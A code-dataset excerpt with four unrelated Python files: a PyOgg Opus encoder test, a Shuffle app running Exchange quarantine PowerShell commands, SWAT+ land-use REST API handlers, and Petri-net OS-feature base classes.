hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acdf86247a00a3d49fcd61264221b1e97c4c06ef | 2,686 | py | Python | tests/test_opus_buffered_encoder.py | lstolcman/PyOgg | 8be17d09942ee9245527b20eed92ef4795964bd4 | [
"BSD-3-Clause",
"Unlicense"
] | null | null | null | tests/test_opus_buffered_encoder.py | lstolcman/PyOgg | 8be17d09942ee9245527b20eed92ef4795964bd4 | [
"BSD-3-Clause",
"Unlicense"
] | null | null | null | tests/test_opus_buffered_encoder.py | lstolcman/PyOgg | 8be17d09942ee9245527b20eed92ef4795964bd4 | [
"BSD-3-Clause",
"Unlicense"
] | null | null | null | import pytest
import pyogg
import os
os.chdir(os.path.dirname(__file__))
# Function to create an encoder and encode a sample of silence
def init_encoder(samples_per_second=48000,
application="audio",
channels=1,
frame_size=20, #ms
duration_ms=60, #ms
set_sampling_frequency=True,
set_application=True,
set_channels=True,
set_frame_size=True,
callback=None):
encoder = pyogg.OpusBufferedEncoder()
if set_application:
encoder.set_application(application)
if set_sampling_frequency:
encoder.set_sampling_frequency(samples_per_second)
if set_channels:
encoder.set_channels(channels)
if set_frame_size:
encoder.set_frame_size(frame_size)
# Create a sample of silence
bytes_per_sample = 2
buf = (
b"\x00"
* bytes_per_sample
* channels
* (samples_per_second // 1000)
* duration_ms
)
if callback is None:
# Encode the sample
_ = encoder.encode(buf)
else:
# Encode with callback
encoder.encode_with_samples(buf, callback=callback)
return encoder
def test_encode():
encoder = init_encoder()
def test_callback():
# Calculate expected number of samples
frame_size_ms = 10
samples_per_second = 48000
expected_samples = (
frame_size_ms
* samples_per_second // 1000
)
# Calculate the expected length of the decoded packet
bytes_per_sample = 2
channels = 2
expected_pcm_length = (
expected_samples
* bytes_per_sample
* channels
)
# Create a decoder to test that the encoded packets are valid
decoder = pyogg.OpusDecoder()
decoder.set_sampling_frequency(samples_per_second)
decoder.set_channels(channels)
# Specify the callback that will receive the encoded packets
def callback(encoded_packet, samples):
assert len(encoded_packet) > 0
assert samples == expected_samples
# Check encoded packet is valid
pcm = decoder.decode(encoded_packet)
assert len(pcm) == expected_pcm_length
# Create the encoder
encoder = init_encoder(
channels = channels,
frame_size = frame_size_ms,
callback = callback
)
def test_invalid_frame_size():
with pytest.raises(pyogg.PyOggError):
encoder = init_encoder(frame_size=15)
def test_frame_size_not_set():
with pytest.raises(pyogg.PyOggError):
encoder = init_encoder(set_frame_size=False)
| 26.86 | 65 | 0.633656 |
acdf86483b280d74784e62848f50e9478fa73ba7 | 5,915 | py | Python | exchange-powershell/1.0.0/src/app.py | frikky/shuffle-apps | 4538370c477e6de6acdb382a672e07bcfe858b18 | [
"MIT"
] | 13 | 2021-12-04T19:37:34.000Z | 2022-03-25T16:17:29.000Z | exchange-powershell/1.0.0/src/app.py | frikky/shuffle-apps | 4538370c477e6de6acdb382a672e07bcfe858b18 | [
"MIT"
] | 85 | 2021-11-17T09:44:56.000Z | 2022-03-28T08:40:00.000Z | exchange-powershell/1.0.0/src/app.py | frikky/shuffle-apps | 4538370c477e6de6acdb382a672e07bcfe858b18 | [
"MIT"
] | 10 | 2021-11-29T12:24:45.000Z | 2022-03-31T13:30:01.000Z | import socket
import asyncio
import time
import random
import json
import subprocess
import base64
from walkoff_app_sdk.app_base import AppBase
# 1. Generate the api.yaml based on downloaded files
# 2. Add a way to choose the rule and the target platform for it
# 3. Add the possibility of translating rules back and forth
# 4. Make it so you can start with Mitre Att&ck techniques
# and automatically get the right rules set up with your tools :O
class exchange_powershell(AppBase):
__version__ = "1.0.0"
app_name = "exchange-powershell"
def __init__(self, redis, logger, console_logger=None):
"""
Each app should have this __init__ to set up Redis and logging.
:param redis:
:param logger:
:param console_logger:
"""
self.filename = "replacementfile.ps1"
super().__init__(redis, logger, console_logger)
def cleanup(self, item):
newlines = []
print(f"Cleanup item: {item}")
record = False
skipped = 0
for line in item.split("\n"):
if line.startswith("{") or line.startswith("["):
record = True
if not record and not line.startswith("{") and not line.startswith("["):
skipped += 1
if record:
newlines.append(line)
print(f"SKIPPED {skipped} lines")
if len(newlines) == 0:
return item
item = "\n".join(newlines)
return item
def replace_and_run(self, username, password, parsed_command):
data = ""
with open(self.filename, "r") as tmp:
data = tmp.read()
if len(data) == 0:
return ""
data = data.replace("{USERNAME}", username)
data = data.replace("{PASSWORD}", password)
data = data.replace("{COMMAND}", parsed_command)
print(f"DATA: {data}")
with open(self.filename, "w+") as tmp:
tmp.write(data)
command = f"pwsh -file {self.filename}"
print(f"PRE POPEN: {command}")
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
shell=True, # nosec
)
print("POST STDOUT")
stdout = process.communicate()
print(f"STDOUT: {stdout}")
item = ""
if len(stdout[0]) > 0:
item = stdout[0]
print("Succesfully ran bash. Stdout: %s" % item)
else:
item = stdout[1]
print("FAILED to run bash. Stdout: %s!" % item)
#return item
try:
new_cleanup = self.cleanup(item)
if len(new_cleanup) > 0:
item = new_cleanup
except Exception as e:
pass
try:
return item.decode("utf-8")
except Exception as e:
return item
return item
# Write your data inside this function
def release_quarantine_message(self, username, password, message_id):
parsed_command = f"Release-QuarantineMessage -Identity {message_id} | ConvertTo-Json"
ret = self.replace_and_run(username, password, parsed_command)
return ret
# Write your data inside this function
def preview_quarantine_message(self, username, password, message_id):
parsed_command = f"Preview-QuarantineMessage -Identity {message_id} | ConvertTo-Json"
ret = self.replace_and_run(username, password, parsed_command)
return ret
# Write your data inside this function
def export_quarantine_message(self, username, password, message_id, skip_upload="false"):
parsed_command = f"Export-QuarantineMessage -Identity {message_id} | ConvertTo-Json"
ret = self.replace_and_run(username, password, parsed_command)
print("RET: %s" % ret)
try:
ret = json.loads(ret)
except json.decoder.JSONDecodeError:
return ret
file_eml = ret["Eml"]
if skip_upload == "true":
return file_eml
message_bytes = base64.b64decode(file_eml)
fileinfo = self.set_files({
"filename": f"{message_id}.eml",
"data": message_bytes
})
if len(fileinfo) == 1:
return {
"success": True,
"file_id": fileinfo[0]
}
return fileinfo
# Write your data inside this function
def delete_quarantine_message(self, username, password, message_id):
parsed_command = f"Delete-QuarantineMessage -Identity {message_id} | ConvertTo-Json"
ret = self.replace_and_run(username, password, parsed_command)
return ret
# Write your data inside this function
def get_quarantine_message(self, username, password, message_id):
parsed_command = f"Get-QuarantineMessage {message_id} | ConvertTo-Json"
ret = self.replace_and_run(username, password, parsed_command)
return ret
# Write your data inside this function
def get_quarantine_messages(self, username, password, time_from, time_to):
#parsed_command = f"Get-QuarantineMessage -StartReceivedDate {time_from} -EndReceivedDate {time_to} | ConvertTo-Json"
#parsed_command = f"Get-QuarantineMessage -StartReceivedDate {time_from} -EndReceivedDate {time_to}"
parsed_command = f"Get-QuarantineMessage -PageSize 50 -Page 1"
ret = self.replace_and_run(username, password, parsed_command)
return ret
# Write your data inside this function
def get_quarantine_messageheaders(self, username, password, message_id):
parsed_command = f"Get-QuarantineMessageHeader {message_id} | ConvertTo-Json"
ret = self.replace_and_run(username, password, parsed_command)
return ret
if __name__ == "__main__":
exchange_powershell.run()
| 32.322404 | 125 | 0.615892 |
acdf87c0a73ffc1bdb30ca30bc06f1dcb3063474 | 19,887 | py | Python | editor_api/rest/lum.py | jphuart/swatplus-automatic-workflow | dd2eeb7f882eb2d4ab7e1e5265c10b9beb93ddc4 | [
"MIT"
] | 8 | 2020-06-28T07:50:29.000Z | 2022-01-05T16:29:48.000Z | editor_api/rest/lum.py | jphuart/swatplus-automatic-workflow | dd2eeb7f882eb2d4ab7e1e5265c10b9beb93ddc4 | [
"MIT"
] | null | null | null | editor_api/rest/lum.py | jphuart/swatplus-automatic-workflow | dd2eeb7f882eb2d4ab7e1e5265c10b9beb93ddc4 | [
"MIT"
] | 5 | 2020-06-28T07:50:31.000Z | 2021-08-16T07:09:59.000Z | from flask_restful import Resource, reqparse, abort
from playhouse.shortcuts import model_to_dict
from peewee import *
from .base import BaseRestModel
from database.project import base
from database.project.setup import SetupProjectDatabase
from database.project.lum import Landuse_lum, Management_sch, Cntable_lum, Cons_prac_lum, Ovn_table_lum, Management_sch_auto, Management_sch_op
from database.project.structural import Tiledrain_str, Septic_str, Filterstrip_str, Grassedww_str, Bmpuser_str
from database.project.hru_parm_db import Urban_urb
from database.project.init import Plant_ini
from database.project.decision_table import D_table_dtl
from database.datasets.setup import SetupDatasetsDatabase
from database.datasets import lum as ds_lum
from database import lib
from helpers import utils
invalid_name_msg = 'Invalid name {name}. Please ensure the value exists in your database.'
def get_landuse_args(get_selected_ids=False):
parser = reqparse.RequestParser()
if get_selected_ids:
parser.add_argument('selected_ids', type=int, action='append', required=False, location='json')
else:
parser.add_argument('id', type=int, required=False, location='json')
parser.add_argument('name', type=str, required=True, location='json')
parser.add_argument('description', type=str, required=False, location='json')
parser.add_argument('cal_group', type=str, required=False, location='json')
parser.add_argument('urb_ro', type=str, required=False, location='json')
parser.add_argument('plnt_com_name', type=str, required=False, location='json')
parser.add_argument('mgt_name', type=str, required=False, location='json')
parser.add_argument('cn2_name', type=str, required=False, location='json')
parser.add_argument('cons_prac_name', type=str, required=False, location='json')
parser.add_argument('urban_name', type=str, required=False, location='json')
parser.add_argument('ov_mann_name', type=str, required=False, location='json')
parser.add_argument('tile_name', type=str, required=False, location='json')
parser.add_argument('sep_name', type=str, required=False, location='json')
parser.add_argument('vfs_name', type=str, required=False, location='json')
parser.add_argument('grww_name', type=str, required=False, location='json')
parser.add_argument('bmp_name', type=str, required=False, location='json')
args = parser.parse_args(strict=True)
return args
def save_landuse_args(self, m, args):
m.name = args['name']
m.description = args['description']
m.cal_group = utils.remove_space(args['cal_group'])
m.urb_ro = args['urb_ro']
m.plnt_com_id = self.get_id_from_name(Plant_ini, args['plnt_com_name'])
m.mgt_id = self.get_id_from_name(Management_sch, args['mgt_name'])
m.cn2_id = self.get_id_from_name(Cntable_lum, args['cn2_name'])
m.cons_prac_id = self.get_id_from_name(Cons_prac_lum, args['cons_prac_name'])
m.urban_id = self.get_id_from_name(Urban_urb, args['urban_name'])
m.ov_mann_id = self.get_id_from_name(Ovn_table_lum, args['ov_mann_name'])
m.tile_id = self.get_id_from_name(Tiledrain_str, args['tile_name'])
m.sep_id = self.get_id_from_name(Septic_str, args['sep_name'])
m.vfs_id = self.get_id_from_name(Filterstrip_str, args['vfs_name'])
m.grww_id = self.get_id_from_name(Grassedww_str, args['grww_name'])
m.bmp_id = self.get_id_from_name(Bmpuser_str, args['bmp_name'])
return m.save()
class LanduseLumListApi(BaseRestModel):
def get(self, project_db, sort, reverse, page, items_per_page):
table = Landuse_lum
list_name = 'landuse'
return self.base_paged_list(project_db, sort, reverse, page, items_per_page, table, list_name, True)
class LanduseLumApi(BaseRestModel):
def get(self, project_db, id):
return self.base_get(project_db, id, Landuse_lum, 'Landuse', True)
def delete(self, project_db, id):
return self.base_delete(project_db, id, Landuse_lum, 'Landuse')
def put(self, project_db, id):
args = get_landuse_args()
try:
SetupProjectDatabase.init(project_db)
m = Landuse_lum.get(Landuse_lum.id == id)
result = save_landuse_args(self, m, args)
if result > 0:
return 200
abort(400, message='Unable to update land use properties {id}.'.format(id=id))
except IntegrityError as e:
abort(400, message='Land use name must be unique.')
except Landuse_lum.DoesNotExist:
abort(404, message='Land use properties {id} does not exist'.format(id=id))
except Plant_ini.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['plnt_com_name']))
except Management_sch.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['mgt_name']))
except Cntable_lum.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['cn2_name']))
except Cons_prac_lum.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['cons_prac_name']))
except Urban_urb.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['urban_name']))
except Ovn_table_lum.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['ov_mann_name']))
except Tiledrain_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['tile_name']))
except Septic_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['sep_name']))
except Filterstrip_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['vfs_name']))
except Grassedww_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['grww_name']))
except Bmpuser_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['bmp_name']))
except Exception as ex:
abort(400, message="Unexpected error {ex}".format(ex=ex))
class LanduseLumPostApi(BaseRestModel):
def post(self, project_db):
args = get_landuse_args()
try:
SetupProjectDatabase.init(project_db)
m = Landuse_lum()
result = save_landuse_args(self, m, args)
if result > 0:
return 200
abort(400, message='Unable to update channel properties {id}.'.format(id=id))
except IntegrityError as e:
abort(400, message='Channel properties name must be unique.')
except Plant_ini.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['plnt_com_name']))
except Management_sch.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['mgt_name']))
except Cntable_lum.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['cn2_name']))
except Cons_prac_lum.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['cons_prac_name']))
except Urban_urb.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['urban_name']))
except Ovn_table_lum.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['ov_mann_name']))
except Tiledrain_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['tile_name']))
except Septic_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['sep_name']))
except Filterstrip_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['vfs_name']))
except Grassedww_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['grww_name']))
except Bmpuser_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['bmp_name']))
except Exception as ex:
abort(400, message="Unexpected error {ex}".format(ex=ex))
class LanduseLumUpdateManyApi(BaseRestModel):
def get(self, project_db):
return self.base_name_id_list(project_db, Landuse_lum)
def put(self, project_db):
SetupProjectDatabase.init(project_db)
args = get_landuse_args(True)
try:
param_dict = {}
if args['cal_group'] is not None:
param_dict['cal_group'] = utils.remove_space(args['cal_group'])
if args['urb_ro'] is not None:
param_dict['urb_ro'] = args['urb_ro']
if args['plnt_com_name'] is not None:
param_dict['plnt_com_id'] = self.get_id_from_name(Plant_ini, args['plnt_com_name'])
if args['mgt_name'] is not None:
param_dict['mgt_id'] = self.get_id_from_name(Management_sch, args['mgt_name'])
if args['cn2_name'] is not None:
param_dict['cn2_id'] = self.get_id_from_name(Cntable_lum, args['cn2_name'])
if args['cons_prac_name'] is not None:
param_dict['cons_prac_id'] = self.get_id_from_name(Cons_prac_lum, args['cons_prac_name'])
if args['urban_name'] is not None:
param_dict['urban_id'] = self.get_id_from_name(Urban_urb, args['urban_name'])
if args['ov_mann_name'] is not None:
param_dict['ov_mann_id'] = self.get_id_from_name(Ovn_table_lum, args['ov_mann_name'])
if args['tile_name'] is not None:
param_dict['tile_id'] = self.get_id_from_name(Tiledrain_str, args['tile_name'])
if args['sep_name'] is not None:
param_dict['sep_id'] = self.get_id_from_name(Septic_str, args['sep_name'])
if args['vfs_name'] is not None:
param_dict['vfs_id'] = self.get_id_from_name(Filterstrip_str, args['vfs_name'])
if args['grww_name'] is not None:
param_dict['grww_id'] = self.get_id_from_name(Grassedww_str, args['grww_name'])
if args['bmp_name'] is not None:
param_dict['bmp_id'] = self.get_id_from_name(Bmpuser_str, args['bmp_name'])
query = Landuse_lum.update(param_dict).where(Landuse_lum.id.in_(args['selected_ids']))
result = query.execute()
if result > 0:
return 200
abort(400, message='Unable to update channel properties.')
except Plant_ini.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['plnt_com_name']))
except Management_sch.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['mgt_name']))
except Cntable_lum.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['cn2_name']))
except Cons_prac_lum.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['cons_prac_name']))
except Urban_urb.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['urban_name']))
except Ovn_table_lum.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['ov_mann_name']))
except Tiledrain_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['tile_name']))
except Septic_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['sep_name']))
except Filterstrip_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['vfs_name']))
except Grassedww_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['grww_name']))
except Bmpuser_str.DoesNotExist:
abort(400, message=invalid_name_msg.format(name=args['bmp_name']))
except Exception as ex:
abort(400, message="Unexpected error {ex}".format(ex=ex))
def save_cntable_lum(m, args):
m.name = args['name']
m.description = utils.remove_space(args['description'])
m.cn_a = args['cn_a']
m.cn_b = args['cn_b']
m.cn_c = args['cn_c']
m.cn_d = args['cn_d']
m.treat = utils.remove_space(args['treat'])
m.cond_cov = utils.remove_space(args['cond_cov'])
return m.save()
class CntableLumListApi(BaseRestModel):
def get(self, project_db, sort, reverse, page, items_per_page):
table = Cntable_lum
list_name = 'cntable'
return self.base_paged_list(project_db, sort, reverse, page, items_per_page, table, list_name)
class CntableLumApi(BaseRestModel):
def get(self, project_db, id):
return self.base_get(project_db, id, Cntable_lum, 'Curve Number')
def delete(self, project_db, id):
return self.base_delete(project_db, id, Cntable_lum, 'Curve Number')
def put(self, project_db, id):
try:
SetupProjectDatabase.init(project_db)
args = self.get_args('cntable_lum', project_db)
m = Cntable_lum.get(Cntable_lum.id == id)
result = save_cntable_lum(m, args)
if result > 0:
return 200
abort(400, message='Unable to update curve number table {id}.'.format(id=id))
except IntegrityError as e:
abort(400, message='Curve number table name must be unique.')
except Cntable_lum.DoesNotExist:
abort(404, message='Curve number table {id} does not exist'.format(id=id))
except Exception as ex:
abort(400, message="Unexpected error {ex}".format(ex=ex))
class CntableLumUpdateManyApi(BaseRestModel):
def get(self, project_db):
return self.base_name_id_list(project_db, Cntable_lum)
def put(self, project_db):
try:
SetupProjectDatabase.init(project_db)
args = self.get_args('cntable_lum', project_db, True)
remove_spaces = ['description', 'treat', 'cond_cov']
param_dict = {}
for key in args.keys():
if args[key] is not None and key != 'selected_ids':
param_dict[key] = utils.remove_space(args[key]) if key in remove_spaces else args[key]
query = Cntable_lum.update(param_dict).where(Cntable_lum.id.in_(args['selected_ids']))
result = query.execute()
if result > 0:
return 200
abort(400, message='Unable to update curve number tables.')
except Exception as ex:
abort(400, message="Unexpected error {ex}".format(ex=ex))
class CntableLumPostApi(BaseRestModel):
def post(self, project_db):
try:
SetupProjectDatabase.init(project_db)
args = self.get_args('cntable_lum', project_db)
m = Cntable_lum()
result = save_cntable_lum(m, args)
if result > 0:
return model_to_dict(m), 201
abort(400, message='Unable to update curve number table {id}.'.format(id=id))
except IntegrityError as e:
abort(400, message='Curve number table name must be unique.')
except Exception as ex:
abort(400, message="Unexpected error {ex}".format(ex=ex))
class CntableLumDatasetsApi(BaseRestModel):
def get(self, datasets_db, name):
return self.base_get_datasets_name(datasets_db, name, ds_lum.Cntable_lum, 'Curve number table')
class OvntableLumListApi(BaseRestModel):
def get(self, project_db, sort, reverse, page, items_per_page):
table = Ovn_table_lum
list_name = 'ovntable'
return self.base_paged_list(project_db, sort, reverse, page, items_per_page, table, list_name)
class OvntableLumApi(BaseRestModel):
def get(self, project_db, id):
return self.base_get(project_db, id, Ovn_table_lum, 'Mannings n')
def delete(self, project_db, id):
return self.base_delete(project_db, id, Ovn_table_lum, 'Mannings n')
def put(self, project_db, id):
return self.base_put(project_db, id, Ovn_table_lum, 'Mannings n')
class OvntableLumUpdateManyApi(BaseRestModel):
def get(self, project_db):
return self.base_name_id_list(project_db, Ovn_table_lum)
def put(self, project_db):
return self.base_put_many(project_db, Ovn_table_lum, 'Mannings n')
class OvntableLumPostApi(BaseRestModel):
def post(self, project_db):
return self.base_post(project_db, Ovn_table_lum, 'Mannings n')
class OvntableLumDatasetsApi(BaseRestModel):
def get(self, datasets_db, name):
return self.base_get_datasets_name(datasets_db, name, ds_lum.Ovn_table_lum, 'Mannings n table')
class ConsPracLumListApi(BaseRestModel):
def get(self, project_db, sort, reverse, page, items_per_page):
table = Cons_prac_lum
list_name = 'cons_prac'
return self.base_paged_list(project_db, sort, reverse, page, items_per_page, table, list_name)
class ConsPracLumApi(BaseRestModel):
def get(self, project_db, id):
return self.base_get(project_db, id, Cons_prac_lum, 'Conservation practice')
def delete(self, project_db, id):
return self.base_delete(project_db, id, Cons_prac_lum, 'Conservation practice')
def put(self, project_db, id):
return self.base_put(project_db, id, Cons_prac_lum, 'Conservation practice')
class ConsPracLumUpdateManyApi(BaseRestModel):
def get(self, project_db):
return self.base_name_id_list(project_db, Cons_prac_lum)
def put(self, project_db):
return self.base_put_many(project_db, Cons_prac_lum, 'Conservation practice')
class ConsPracLumPostApi(BaseRestModel):
def post(self, project_db):
return self.base_post(project_db, Cons_prac_lum, 'Conservation practice')
class ConsPracLumDatasetsApi(BaseRestModel):
def get(self, datasets_db, name):
return self.base_get_datasets_name(datasets_db, name, ds_lum.Cons_prac_lum, 'Conservation practices')
def get_mgt_args():
parser = reqparse.RequestParser()
parser.add_argument('id', type=int, required=False, location='json')
parser.add_argument('name', type=str, required=True, location='json')
parser.add_argument('auto_ops', type=list, required=False, location='json')
parser.add_argument('operations', type=list, required=False, location='json')
args = parser.parse_args(strict=True)
return args
class ManagementSchListApi(BaseRestModel):
def get(self, project_db, sort, reverse, page, items_per_page):
table = Management_sch
list_name = 'mgt_sch'
SetupProjectDatabase.init(project_db)
total = table.select().count()
sort_val = SQL(sort)
if reverse == 'true':
sort_val = SQL(sort).desc()
m = table.select().order_by(sort_val).paginate(int(page), int(items_per_page))
ml = [{'id': v.id, 'name': v.name, 'num_ops': len(v.operations), 'num_auto': len(v.auto_ops)} for v in m]
return {'total': total, list_name: ml}
class ManagementSchApi(BaseRestModel):
def get(self, project_db, id):
return self.base_get(project_db, id, Management_sch, 'Management schedule', back_refs=True, max_depth=2)
def delete(self, project_db, id):
return self.base_delete(project_db, id, Management_sch, 'Management schedule')
def put(self, project_db, id):
try:
SetupProjectDatabase.init(project_db)
args = get_mgt_args()
m = Management_sch.get(Management_sch.id == id)
m.name = args['name']
m.save()
new_auto = []
for a in args['auto_ops']:
try:
dt = D_table_dtl.get((D_table_dtl.file_name == 'lum.dtl') & (D_table_dtl.name == a))
new_auto.append({'management_sch_id': m.id, 'd_table_id': dt.id})
except D_table_dtl.DoesNotExist:
abort(404, message='Decision table {name} does not exist'.format(name=a))
new_ops = []
order = 1
for o in args['operations']:
new_ops.append({
'management_sch_id': m.id,
'op_typ': o['op_typ'],
'mon': o['mon'],
'day': o['day'],
'op_data1': o['op_data1'],
'op_data2': o['op_data2'],
'op_data3': o['op_data3'],
'order': o['order'],
'hu_sch': o['hu_sch']
})
order += 1
Management_sch_auto.delete().where(Management_sch_auto.management_sch_id == m.id).execute()
lib.bulk_insert(base.db, Management_sch_auto, new_auto)
Management_sch_op.delete().where(Management_sch_op.management_sch_id == m.id).execute()
lib.bulk_insert(base.db, Management_sch_op, new_ops)
return 200
except IntegrityError as e:
abort(400, message='Management schedule name must be unique.')
except Cons_prac_lum.DoesNotExist:
abort(404, message='Management schedule {id} does not exist'.format(id=id))
except Exception as ex:
abort(400, message="Unexpected error {ex}".format(ex=ex))
class ManagementSchPostApi(BaseRestModel):
def post(self, project_db):
try:
args = get_mgt_args()
m = Management_sch()
m.name = args['name']
m.save()
new_auto = []
for a in args['auto_ops']:
try:
dt = D_table_dtl.get((D_table_dtl.file_name == 'lum.dtl') & (D_table_dtl.name == a))
new_auto.append({'management_sch_id': m.id, 'd_table_id': dt.id})
except D_table_dtl.DoesNotExist:
abort(404, message='Decision table {name} does not exist'.format(name=a))
new_ops = []
order = 1
for o in args['operations']:
new_ops.append({
'management_sch_id': m.id,
'op_typ': o['op_typ'],
'mon': o['mon'],
'day': o['day'],
'op_data1': o['op_data1'],
'op_data2': o['op_data2'],
'op_data3': o['op_data3'],
'order': o['order'],
'hu_sch': o['hu_sch']
})
order += 1
lib.bulk_insert(base.db, Management_sch_auto, new_auto)
lib.bulk_insert(base.db, Management_sch_op, new_ops)
return 201
except IntegrityError as e:
abort(400, message='Management schedule name must be unique.')
except Exception as ex:
abort(400, message="Unexpected error {ex}".format(ex=ex))
| 37.381579 | 143 | 0.742143 |
acdf88dfb7294f7948f1c92cb131526d8d1cdf30 | 4,780 | py | Python | petri_net_interpreter/os_features.py | MarshallRawson/petri_net_interpreter | 5324b808363b726f38821a78b9246456914a9c42 | [
"MIT"
] | 2 | 2020-05-01T21:10:50.000Z | 2020-05-23T17:06:03.000Z | petri_net_interpreter/os_features.py | MarshallRawson/petri_net_interpreter | 5324b808363b726f38821a78b9246456914a9c42 | [
"MIT"
] | 2 | 2020-07-08T18:09:05.000Z | 2020-07-15T15:12:07.000Z | petri_net_interpreter/os_features.py | MarshallRawson/petri_net_interpreter | 5324b808363b726f38821a78b9246456914a9c42 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from abc import ABC, abstractmethod
from petri_net_interpreter.graph_entities import Place, Transition
class OsFeature(ABC):
def __init__(self, parent):
self.parent = parent
@abstractmethod
def prototype(self):
pass
def define(self):
return ''
@abstractmethod
def initialize(self):
pass
class Debug(OsFeature):
def __init__(self, parent):
super().__init__(parent)
def string_len(self):
all_names = ''
for name in self.parent.places.keys():
all_names += name
return len(all_names) + len(self.parent.places.keys()) * 6
def get_debug_state(self):
s = '// Get Debug state\n'
s += 'char debug_state[' + str(self.string_len()) + '];\n'
s += 'snprintf(debug_state, ' + str(self.string_len()) + ', "'
for name in self.parent.places.keys():
s += name + ': %d\\n'
s += '\\n", \n'
for place in self.parent.places.values():
s += place.output.get_status() + ',\n'
i = s.rfind(',')
s = s[:i] + s[i + 1:]
s += ');\n'
return s
def prototype(self):
return ''
def initialize(self):
return ''
def call(self, give_string):
return give_string
class ProccessOutput(OsFeature):
def __init__(self, parent, name):
super().__init__(parent)
self.name = name
self.previous_names = []
@abstractmethod
def is_ready(self):
pass
@abstractmethod
def take(self, val):
pass
@abstractmethod
def give(self, val):
pass
@abstractmethod
def close(self):
pass
def change_name(self, new_name):
self.previous_names.append(self.name)
self.name = new_name
def revert_name(self):
self.name = self.previous_names.pop()
class InterProccessCommunication(ProccessOutput):
def __init__(self, place, name=None):
if name is None:
name = place.name + '_OUT_IPC'
super().__init__(place, name)
def give(self, val):
return self.enqueue(val)
def take(self, val):
return self.dequeue(val)
@abstractmethod
def enqueue(self, val):
pass
@abstractmethod
def dequeue(self, val):
pass
def is_ready(self):
return self.check_for_new_data()
@abstractmethod
def check_for_new_data(self):
pass
@abstractmethod
def get_size(self):
pass
def get_status(self):
return self.get_size()
def __str__(self):
return self.name
class Semaphore(ProccessOutput):
def __init__(self, place, name=None):
if name is None:
name = place.name + '_OUT_SEMAPHORE'
super().__init__(place, name)
def give(self, val):
return self.signal()
@abstractmethod
def signal(self):
pass
def take(self, val):
return self.wait()
@abstractmethod
def wait(self):
pass
@abstractmethod
def get_value(self):
pass
def get_status(self):
return self.get_value()
def is_ready(self):
return '(' + self.get_value() + ' > 0)'
def __str__(self):
return self.name
class OperatingSystem(ABC):
def __init__(self, ipc, sem, place, transition, debug=Debug):
self.ipc = ipc
if not issubclass(ipc, InterProccessCommunication):
raise Exception('ipc must inherit from InterProccessCommunication')
self.sem = sem
if not issubclass(sem, Semaphore):
raise Exception('sem must inherit from Semaphore')
self.place = place
if not issubclass(place, Place):
raise Exception('place must inherit from Place')
self.transition = transition
if not issubclass(transition, Transition):
raise Exception('transition must inherit from Transition')
self.debug = debug
if not issubclass(debug, Debug):
raise Exception('debug must inherit from Debug')
@staticmethod
def place_body_name(place):
return place.name + '_body'
@staticmethod
def place_wrapper_name(place):
return place.name + '_wrapper'
def header_file_start(self, net):
return "#pragma once"
def header_file_end(self, net):
return ''
def source_file_start(self, net):
return ''
def source_file_end(self, net):
return ''
@staticmethod
@abstractmethod
def includes():
pass
@staticmethod
@abstractmethod
def kill_self():
pass
@classmethod
@abstractmethod
def add_thread(cls, place, param):
pass
def initialize(self):
return ''
| 22.441315 | 79 | 0.591841 |
